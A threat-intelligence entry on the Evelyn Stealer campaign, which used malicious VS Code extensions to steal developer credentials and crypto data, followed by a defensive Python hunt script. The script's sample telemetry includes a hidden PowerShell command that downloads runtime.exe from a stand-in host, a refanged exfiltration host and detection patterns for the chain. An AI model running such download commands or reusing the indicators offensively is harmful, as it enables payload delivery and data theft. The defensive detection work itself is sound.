Evelyn Stealer abuse of VS Code extensions to steal developer data
Malware Activity
Summary
A new stealer operation is using malicious VS Code extensions to compromise software developers, creating a high-risk path into developer environments and broader organizational systems. The payload, Evelyn Stealer, is designed to collect credentials, cryptocurrency data, cookies, and screenshots. It also targets production systems and cloud resources, increasing the chance of follow-on compromise beyond the initial workstation. The activity matters because developer tools and extensions are being turned into a delivery channel for data theft.
Related Happenings
Fox Tempest's malware-signing service scales trusted-signed malware for ransomware gangs
Threat Actor Meta
First: 20.05.2026 00:47
Last: 20.05.2026 00:47
Sources 1
About this happening:
Microsoft disrupted **Fox Tempest**'s **malware-signing service** in **May 2026**, cutting off a criminal platform that helped ransomware gangs and other cybercriminals obtain tru...
Node-ipc malicious versions with stealer/backdoor payload
Malware Activity
First: 14.05.2026 20:22
Last: 14.05.2026 20:22
Sources 1
About this happening:
Three **node-ipc** releases now carry an **obfuscated stealer/backdoor** that can harvest **developer and cloud secrets** from any system that loads the package. The malicious cod...
ModeloRAT malicious PowerShell and Dropbox delivery activity
Malware Activity
First: 14.05.2026 15:12
Last: 14.05.2026 15:12
Sources 1
About this happening:
The **ModeloRAT** activity now uses a **malicious PowerShell command** and a **Dropbox ZIP payload** to gain persistent footholds, enabling **system reconnaissance**, **screenshot...
Sefirah infostealer delivered through a malicious Hugging Face repository
Malware Activity
First: 09.05.2026 17:26
Last: 09.05.2026 17:26
Sources 1
About this happening:
A malicious **Hugging Face** repository impersonated **OpenAI’s Privacy Filter** and delivered **sefirah**, a **Rust-based infostealer**, to **Windows** users, creating credential...
MacOS living-off-the-land analysis exposing native-feature abuse
Technical Analysis
First: 22.04.2026 19:30
Last: 22.04.2026 19:30
Sources 1
About this happening:
Native macOS features are now being repurposed for **code execution**, **lateral movement**, and **evasion**, widening detection gaps across enterprise Apple fleets. The analysis...
Timeline
20.01.2026 13:48 2 articles · 4mo ago
Evelyn Stealer VS Code extension campaign disclosure
Initial Disclosure: Cybersecurity researchers disclosed a malware campaign targeting software developers through the Microsoft Visual Studio Code (VS Code) extension ecosystem, with Evelyn Stealer delivered through malicious extensions such as BigBlack.bitcoin-black, BigBlack.codo-ai, and BigBlack.mrbigblacktheme. The campaign was first documented by Koi Security in the month before this report and later analyzed by Trend Micro. Trend Micro described a chain in which the extension drops Lightshot.dll, launches a hidden PowerShell command to fetch runtime.exe, and injects the stealer into grpconv.exe. The stealer collects credentials, cryptocurrency-related data, clipboard contents, installed applications, running processes, desktop screenshots, stored Wi-Fi credentials, system information, and Google Chrome and Microsoft Edge cookies, packs them into a ZIP archive, and exfiltrates it to server09.mentality[.]cloud over FTP. The malware also uses browser flags and a mutex to reduce interference and detection. Because the victims are developers, a compromised workstation may provide access into broader organizational systems.
Sources:
- Evelyn Stealer Malware Abuses VS Code Extensions to Steal Developer Credentials and Crypto — thehackernews.com — 20.01.2026 13:48
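The chain in the timeline entry above (malicious BigBlack.* extension, Lightshot.dll dropped, hidden PowerShell fetching runtime.exe, stealer injected into grpconv.exe, ZIP exfiltration to server09.mentality[.]cloud over FTP) maps directly onto three hunt queries. The following is an added example, not code from the page, from Koi Security or from Trend Micro: a small Python hunt that checks a workstation's VS Code extensions.json against the three extension IDs named in the disclosure and runs the chain logic over process, file and network telemetry. The telemetry schema (dicts with `event`, `image`, `parent_image`, `command_line`, `path`, `dest_host`, `dest_port`) and all sample events are constructed for this example; the exfil host is refanged from the page's defanged form. The assumption that grpconv.exe, a legacy Program Manager group converter, has no legitimate reason to open outbound connections is the author's, not the page's.

```python
import json
import re
from typing import Iterable

# Indicators from the disclosure on this page. The host appears there defanged
# as server09.mentality[.]cloud; it is refanged here so it can be matched.
MALICIOUS_EXTENSION_IDS = {
    "bigblack.bitcoin-black",
    "bigblack.codo-ai",
    "bigblack.mrbigblacktheme",
}
EXFIL_HOST = "server09.mentality.cloud"
DROPPED_DLL = "lightshot.dll"
STAGE2_NAME = "runtime.exe"
INJECTION_TARGET = "grpconv.exe"

# Matches both the long and short spelling of PowerShell's hidden-window switch.
HIDDEN_PS_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def scan_extensions(extensions_json: str) -> list[str]:
    """Return installed extension IDs that are on the known-bad list.

    `extensions_json` is the text of VS Code's extensions.json (a JSON array
    whose records carry identifier.id as "publisher.name"). Comparison is
    case-insensitive because publisher IDs are not case-sensitive in the store.
    """
    hits = []
    for entry in json.loads(extensions_json):
        ext_id = entry.get("identifier", {}).get("id", "").lower()
        if ext_id in MALICIOUS_EXTENSION_IDS:
            hits.append(ext_id)
    return hits


def detect_chain(events: Iterable[dict]) -> list[str]:
    """Flag telemetry that matches the three stages described in the report.

    Event kinds (constructed schema): 'file_write' {path}, 'process'
    {image, parent_image, command_line}, 'network' {image, dest_host, dest_port}.
    """
    alerts = []
    for ev in events:
        kind = ev.get("event")
        if kind == "file_write":
            # Stage 1: the DLL is dropped from inside the extensions directory.
            path = ev["path"].replace("\\", "/").lower()
            if path.endswith("/" + DROPPED_DLL) and "/.vscode/extensions/" in path:
                alerts.append(f"stage1: {DROPPED_DLL} written under extensions dir: {ev['path']}")
        elif kind == "process":
            # Stage 2: VS Code itself spawns a hidden PowerShell that pulls runtime.exe.
            image = ev["image"].lower()
            parent = ev.get("parent_image", "").lower()
            cmd = ev.get("command_line", "")
            if (image.endswith("powershell.exe") and parent.endswith("code.exe")
                    and HIDDEN_PS_RE.search(cmd) and STAGE2_NAME in cmd.lower()):
                alerts.append(f"stage2: hidden PowerShell from VS Code fetching {STAGE2_NAME}")
        elif kind == "network":
            # Stage 3: the injection host talks to the exfil server, or to FTP at all.
            # Assumption (author's): grpconv.exe never needs the network, so any
            # outbound connection from it is worth a look; host/port match is high confidence.
            image = ev["image"].lower()
            host = ev.get("dest_host", "").lower()
            port = ev.get("dest_port")
            if image.endswith(INJECTION_TARGET):
                if host == EXFIL_HOST or port == 21:
                    alerts.append(f"stage3: {INJECTION_TARGET} FTP/exfil to {host}:{port}")
                else:
                    alerts.append(f"review: {INJECTION_TARGET} unexpected outbound to {host}:{port}")
    return alerts


# Constructed sample inputs: one bad extension among benign ones, and a short
# telemetry stream with two benign events mixed in.
SAMPLE_EXTENSIONS_JSON = json.dumps([
    {"identifier": {"id": "ms-python.python"}, "version": "2024.0.0"},
    {"identifier": {"id": "BigBlack.codo-ai"}, "version": "1.0.0"},
])

SAMPLE_EVENTS = [
    {"event": "file_write",
     "path": r"C:\Users\dev\.vscode\extensions\bigblack.codo-ai-1.0.0\Lightshot.dll"},
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -Command \"iwr http://example.invalid/runtime.exe -OutFile $env:TEMP\\runtime.exe\""},
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile -File build.ps1"},
    {"event": "network", "image": r"C:\Windows\System32\grpconv.exe",
     "dest_host": "server09.mentality.cloud", "dest_port": 21},
    {"event": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "update.googleapis.com", "dest_port": 443},
]


def run_sample() -> tuple[list[str], list[str]]:
    """Run both checks over the constructed inputs and return (extension hits, alerts)."""
    return scan_extensions(SAMPLE_EXTENSIONS_JSON), detect_chain(SAMPLE_EVENTS)


if __name__ == "__main__":
    ext_hits, chain_alerts = run_sample()
    print("extension hits:", ext_hits)
    for line in chain_alerts:
        print(line)
```

On a real host, feed `scan_extensions` the contents of `%USERPROFILE%\.vscode\extensions\extensions.json` and map your EDR's process-creation, file-write and network-connection events onto the three event kinds. The extension check is the cheapest and most specific signal; the stage-2 rule (Code.exe parent, hidden window, runtime.exe) is the one most likely to generalize to other malicious extensions that reuse the same loader pattern.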